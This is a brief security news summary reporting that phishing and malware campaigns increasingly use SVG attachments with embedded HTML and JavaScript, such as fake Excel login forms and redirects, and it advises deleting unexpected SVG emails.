Increase in SVG Attachments Used in Phishing Campaigns
/ 3 min read
Quick take - Threat actors are increasingly using Scalable Vector Graphics (SVG) attachments in phishing and malware distribution campaigns, posing significant security risks due to their ability to execute HTML and JavaScript, which often evade detection by conventional security software.
Fast Facts
- Threat actors are increasingly using Scalable Vector Graphics (SVG) attachments in phishing and malware campaigns, marking a shift in tactics.
- Unlike pixel-based formats like JPG or PNG, SVG images are vector-based and can execute HTML and JavaScript, posing significant security risks.
- Recent SVG files have been found mimicking familiar formats, such as Excel spreadsheets, to capture user credentials through fake login forms.
- SVG attachments often evade detection by conventional security software due to their textual nature, leading to alarmingly low detection rates.
- Security experts recommend deleting emails with SVG attachments unless the recipient is a developer expecting such files, to mitigate associated risks.
Threat Actors Exploit SVG Attachments in Phishing and Malware Campaigns
A Notable Shift in Tactics
Threat actors are increasingly exploiting Scalable Vector Graphics (SVG) attachments in phishing and malware distribution campaigns. Unlike common web image formats such as JPG or PNG, which consist of pixels, SVG images are vector-based. They are created using mathematical formulas to represent lines, shapes, and text. This fundamental difference allows SVG images to resize without losing quality, making them adaptable for various screen resolutions.
Rising Use in Phishing Schemes
Security researchers, including the MalwareHunterTeam, have observed a rise in the use of SVG files in phishing schemes, particularly noting their deployment in campaigns associated with Qbot malware. SVG attachments can not only display graphics but also execute HTML and JavaScript when opened, presenting a significant security risk. Recent malicious SVG files have been identified that mimic familiar formats, such as Excel spreadsheets, embedding fake login forms designed to capture user credentials. Additionally, some SVGs have been crafted to impersonate official documents, enticing users to download malware.
Challenges in Detection and Recommendations
In more sophisticated attacks, SVG attachments may contain embedded JavaScript that redirects users to phishing websites immediately upon opening the file. One of the challenges in combating this emerging threat is that SVG files often evade detection by conventional security software due to their textual nature. Analysis of SVG attachment samples has revealed alarmingly low detection rates, with some files showing only one or two detections by security programs.
Given that receiving SVG attachments is uncommon in legitimate emails, security experts advise exercising extreme caution with such files. It is recommended to delete any emails containing SVG attachments unless the recipient is a developer who is explicitly expecting these types of files. This precautionary measure is essential to mitigate the risks associated with the increasing use of SVGs in cyberattacks.
Original Source: Read the Full Article Here
